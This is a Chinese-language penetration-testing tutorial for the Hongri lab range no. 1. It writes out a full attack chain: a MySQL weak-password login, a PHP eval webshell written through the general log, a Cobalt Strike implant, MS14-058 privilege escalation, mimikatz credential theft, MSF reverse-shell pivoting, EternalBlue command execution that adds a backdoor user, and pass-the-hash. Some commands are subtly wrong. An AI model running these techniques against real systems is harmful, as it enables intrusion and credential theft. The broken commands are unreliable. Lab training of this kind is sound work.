内网靶场详细渗透(红日靶场一)
字数 1182 2025-08-23 18:31:25

内网靶场详细渗透教学文档(红日靶场一)

环境配置

  1. 网络环境:内网环境,网段为192.168.1.0/24
  2. 目标主机:192.168.1.130
  3. 环境配置可参考文章末尾的参考文献

信息收集阶段

主机发现

netdiscover -r 192.168.1.0/24

端口扫描

nmap -sS -sV -Pn 192.168.1.130

扫描结果显示开放端口:

  • 80端口:HTTP服务
  • 3389端口:RDP远程桌面
  • 3306端口:MySQL数据库

Web渗透阶段

1. 访问80端口

发现phpstudy探针,可用于检测数据库连接情况

2. 数据库弱口令测试

发现存在MySQL弱口令:

  • 用户名:root
  • 密码:root

3. 数据库权限检查

show global variables like '%secure%'

检查结果:

  • 字段为null表示不可写任意目录
  • 为空表示可写任意目录
  • 指定路径表示只能写入该路径

4. 日志写入Webshell

-- 检查日志功能
show global variables '%general%'

-- 开启日志功能
set global general_log = NO

-- 更改日志路径为web目录
set global general_log_file = 'C:/phpstudy/WWW/test.php'

-- 验证日志路径更改
show global variables '%general%'

-- 写入一句话木马
select '<?php eval($_POST[1])'

5. 连接Webshell

  • 使用蚁剑连接上传的木马文件
  • 验证PHP代码是否被解析(浏览器访问时不显示源代码表示成功)

权限提升与横向移动

1. 使用CS生成木马

  • 生成监听器
  • 生成exe木马并上传
  • 通过蚁剑虚拟终端执行木马
  • CS成功上线

2. 系统信息收集

shell systeminfo

检查补丁情况,发现补丁较少,可进行提权

3. 权限提升

  • 右键选择Access → Elevate
  • 使用ms14-058漏洞进行提权
  • 也可使用其他漏洞和插件

4. 密码获取

使用mimikatz获取密码

内网渗透

方法一:MSF+proxychains+kali

1. CS会话注入MSF

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost [本机IP]
set lport [监听端口]
exploit

在CS创建foreign监听器,IP和端口与MSF一致

2. 添加路由

run post/multi/manage/autoroute
run autoroute -p  # 查看路由

3. 开启socks代理

use auxiliary/server/socks_proxy
set version 4a
set srvhost 0.0.0.0
set srvport 1080
run
jobs  # 查看代理状态

4. 配置kali代理

vim /etc/proxychains4.conf
proxychains firefox 192.168.52.138:80

5. 内网主机发现

use post/windows/gather/arp_scanner
set RHOSTS 192.168.52.0/24
set SESSION 1
exploit

6. 端口扫描

proxychains nmap [目标IP]

7. UDP扫描

use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 192.168.52.0/24
exploit

8. 永恒之蓝漏洞利用

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.52.141
exploit

use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.141
exploit

9. 添加用户并开启telnet

set COMMAND net user hack admin.111 /add
set COMMAND sc config tlntsvr start= auto
set COMMAND net start telnet
set COMMAND netstat -an

10. Telnet登录

telnet [目标IP]
# 使用创建的用户名hack和密码admin.123登录

方法二:Windows+CS+Proxifier

1. 端口转发

  • 使用CS端口转发工具
  • 配置Proxifier代理设置

2. 浏览器代理配置

  • 将浏览器exe加入代理规则
  • 使浏览器流量走代理通道

3. Hash传递攻击(PTH)

# 获取ntml值
mimikatz

# 进行PTH攻击
shell dir \\IP\c$

4. 横向移动

net view  # 获取域内主机
# 使用psexec进行渗透

常见问题与解决方案

1. proxychains使用问题

  • 权限问题:尝试切换为普通用户
  • nmap扫描失败:检查代理配置和权限

2. Telnet登录问题

  • 必须将登录用户加入telnetclients组
  • 命令:net localgroup telnetclients hack /add

总结

本渗透测试流程涵盖了从外网到内网的完整渗透路径,包括:

  1. 信息收集
  2. Web渗透
  3. 权限提升
  4. 内网横向移动
  5. 多种渗透方法(MSF+proxychains+kali和Windows+CS+Proxifier)

关键点:

  • 日志写入Webshell技术
  • CS与MSF联动
  • 内网代理配置
  • 永恒之蓝漏洞利用
  • Hash传递攻击
  • 横向移动技术

参考文献

  1. CS使用参考
  2. 内网渗透技术
  3. 红日靶场渗透
内网靶场详细渗透教学文档(红日靶场一) 环境配置 网络环境:内网环境,网段为192.168.1.0/24 目标主机:192.168.1.130 环境配置可参考文章末尾的参考文献 信息收集阶段 主机发现 端口扫描 扫描结果显示开放端口: 80端口:HTTP服务 3389端口:RDP远程桌面 3306端口:MySQL数据库 Web渗透阶段 1. 访问80端口 发现phpstudy探针,可用于检测数据库连接情况 2. 数据库弱口令测试 发现存在MySQL弱口令: 用户名:root 密码:root 3. 数据库权限检查 检查结果: 字段为null表示不可写任意目录 为空表示可写任意目录 指定路径表示只能写入该路径 4. 日志写入Webshell 5. 连接Webshell 使用蚁剑连接上传的木马文件 验证PHP代码是否被解析(浏览器访问时不显示源代码表示成功) 权限提升与横向移动 1. 使用CS生成木马 生成监听器 生成exe木马并上传 通过蚁剑虚拟终端执行木马 CS成功上线 2. 系统信息收集 检查补丁情况,发现补丁较少,可进行提权 3. 权限提升 右键选择Access → Elevate 使用ms14-058漏洞进行提权 也可使用其他漏洞和插件 4. 密码获取 使用mimikatz获取密码 内网渗透 方法一:MSF+proxychains+kali 1. CS会话注入MSF 在CS创建foreign监听器,IP和端口与MSF一致 2. 添加路由 3. 开启socks代理 4. 配置kali代理 5. 内网主机发现 6. 端口扫描 7. UDP扫描 8. 永恒之蓝漏洞利用 9. 添加用户并开启telnet 10. Telnet登录 方法二:Windows+CS+Proxifier 1. 端口转发 使用CS端口转发工具 配置Proxifier代理设置 2. 浏览器代理配置 将浏览器exe加入代理规则 使浏览器流量走代理通道 3. Hash传递攻击(PTH) 4. 横向移动 常见问题与解决方案 1. proxychains使用问题 权限问题:尝试切换为普通用户 nmap扫描失败:检查代理配置和权限 2. Telnet登录问题 必须将登录用户加入telnetclients组 命令: net localgroup telnetclients hack /add 总结 本渗透测试流程涵盖了从外网到内网的完整渗透路径,包括: 信息收集 Web渗透 权限提升 内网横向移动 多种渗透方法(MSF+proxychains+kali和Windows+CS+Proxifier) 关键点: 日志写入Webshell技术 CS与MSF联动 内网代理配置 永恒之蓝漏洞利用 Hash传递攻击 横向移动技术 参考文献 CS使用参考 内网渗透技术 红日靶场渗透